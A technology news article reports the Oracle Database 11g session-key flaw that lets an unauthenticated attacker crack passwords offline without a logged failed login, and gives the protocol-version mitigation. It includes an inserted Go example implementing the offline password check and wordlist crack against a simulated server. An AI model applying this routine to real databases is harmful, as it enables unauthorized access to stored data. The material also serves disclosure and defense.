Flaw Exposes Oracle Database Passwords

A vulnerability in Oracle Database 11g Releases 1 and 2 could allow a remote, unauthenticated attacker to recover users' passwords and, with them, the data stored in the database.

The flaw, first reported by Kaspersky Lab's Threatpost and discovered by researcher Esteban Martinez Fayo, stems from the way the database's authentication protocol protects the session key it sends to a client during login. According to Fayo, a tool he built cracked a database password, and with it gained access to private data, in about five hours.

"This Session Key is a random value that the server generates and sends as the initial step in the authentication process, before the authentication has been completed," said Fayo. "This is the reason why this attack can be done remotely without the need for authentication and also, as the attacker can close the connection once the Session Key has been sent, there is no failed login attempt recorded in the server because the authentication is never completed."

Fayo found the issue after noticing that the client and the server handled incorrect passwords differently during login attempts: the server did not log every failed attempt. Investigating why, he found that the Session Key the server sends leaks information about the password hash, enough to test password guesses offline without ever completing a login.
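The exchange described above, as an added example that is not part of the original article and not Fayo's tool: a simulated server produces the pre-authentication AUTH_SESSKEY, and an attacker who has only that value and the salt tests password guesses offline. The cryptographic details assumed here (AES-192 key built from SHA-1(password || salt) plus four zero bytes, zero IV, a 40-byte session key padded with eight 0x08 bytes) follow the publicly documented version-11 O5LOGON scheme as implemented in password-cracking tools, not anything stated in this article; the password and wordlist are constructed.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha1"
	"encoding/hex"
	"errors"
	"fmt"
)

// Sizes assumed from the public description of the version-11 exchange
// (not taken from this article).
const (
	saltLen       = 10 // AUTH_VFR_DATA sent with the session key
	sessionKeyLen = 40 // random server session key before padding
	padLen        = 8  // PKCS#7 padding that brings 40 bytes up to 48
)

// deriveKey builds the AES-192 key: SHA-1(password || salt) followed by four zero bytes.
func deriveKey(password string, salt []byte) []byte {
	h := sha1.New()
	h.Write([]byte(password))
	h.Write(salt)
	return append(h.Sum(nil), 0, 0, 0, 0) // 20 + 4 = 24 bytes
}

// aesCBC encrypts or decrypts whole blocks in CBC mode with an all-zero IV.
func aesCBC(key, in []byte, decrypt bool) ([]byte, error) {
	if len(in)%aes.BlockSize != 0 {
		return nil, errors.New("input is not a multiple of the AES block size")
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	iv := make([]byte, aes.BlockSize)
	out := make([]byte, len(in))
	if decrypt {
		cipher.NewCBCDecrypter(block, iv).CryptBlocks(out, in)
	} else {
		cipher.NewCBCEncrypter(block, iv).CryptBlocks(out, in)
	}
	return out, nil
}

// ServerAuthSessKey models the server side: it pads the random session key and
// encrypts it under a key derived from the user's password, then hands the result
// (AUTH_SESSKEY) to a client that has not authenticated yet, together with the salt.
func ServerAuthSessKey(password string, salt, sessionKey []byte) ([]byte, error) {
	if len(salt) != saltLen || len(sessionKey) != sessionKeyLen {
		return nil, errors.New("unexpected salt or session key length")
	}
	padded := append(append([]byte{}, sessionKey...), bytes.Repeat([]byte{padLen}, padLen)...)
	return aesCBC(deriveKey(password, salt), padded, false)
}

// CheckGuess is the attacker's offline test: a wrong password decrypts to random
// bytes, the right one exposes the 0x08 padding. No further server contact is needed,
// so nothing is logged as a failed login.
func CheckGuess(guess string, salt, authSessKey []byte) bool {
	pt, err := aesCBC(deriveKey(guess, salt), authSessKey, true)
	if err != nil || len(pt) < padLen {
		return false
	}
	return bytes.Equal(pt[len(pt)-padLen:], bytes.Repeat([]byte{padLen}, padLen))
}

// CrackOffline runs a wordlist against one captured AUTH_SESSKEY/salt pair.
func CrackOffline(authSessKey, salt []byte, wordlist []string) (string, bool) {
	for _, w := range wordlist {
		if CheckGuess(w, salt, authSessKey) {
			return w, true
		}
	}
	return "", false
}

func main() {
	// Constructed demo: the server picks a fresh salt and session key for a login
	// attempt by a user whose hypothetical password is "Spr1ngTime".
	salt := make([]byte, saltLen)
	sessionKey := make([]byte, sessionKeyLen)
	if _, err := rand.Read(salt); err != nil {
		panic(err)
	}
	if _, err := rand.Read(sessionKey); err != nil {
		panic(err)
	}
	authSessKey, err := ServerAuthSessKey("Spr1ngTime", salt, sessionKey)
	if err != nil {
		panic(err)
	}
	// This is everything a client that hangs up at this point gets to see.
	fmt.Printf("AUTH_VFR_DATA=%s\nAUTH_SESSKEY=%s\n", hex.EncodeToString(salt), hex.EncodeToString(authSessKey))

	pw, ok := CrackOffline(authSessKey, salt, []string{"welcome1", "oracle", "manager", "Spr1ngTime"})
	fmt.Printf("cracked=%v password=%q\n", ok, pw)
}
```

The point the example makes is the one in Fayo's quote: the padding check turns the session key into a password verifier that can be tested at wordlist speed, one hash and one AES decryption per guess, with the connection already closed. A wrong guess passes the check only with probability about 2^-64, so false positives are not a practical concern.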

While Fayo is only now publicly disclosing the flaw, he said he told Oracle about it in May 2010. Oracle, however, has fixed the weakness only in version 12 of the authentication protocol, so databases that still accept the older protocol versions remain vulnerable.

Given the severity of the vulnerability, administrators should configure their servers to accept only the fixed protocol version; on 11g that means setting SQLNET.ALLOWED_LOGON_VERSION=12 in the server's sqlnet.ora. Note that clients older than 11.2.0.3 do not speak protocol version 12 and will no longer be able to connect once that setting is in place.

"The Oracle stealth password cracking vulnerability is a critical one. There are many components to affirm this: It is easy to exploit, it doesn't leave any trace in the database server and it resides in an essential component of the logon protocol," said Fayo.

Oracle has not commented on the flaw, and has announced no plans to fix the older versions of the protocol.

About the Author

Chris Paoli (@ChrisPaoli5) is the associate editor for Converge360.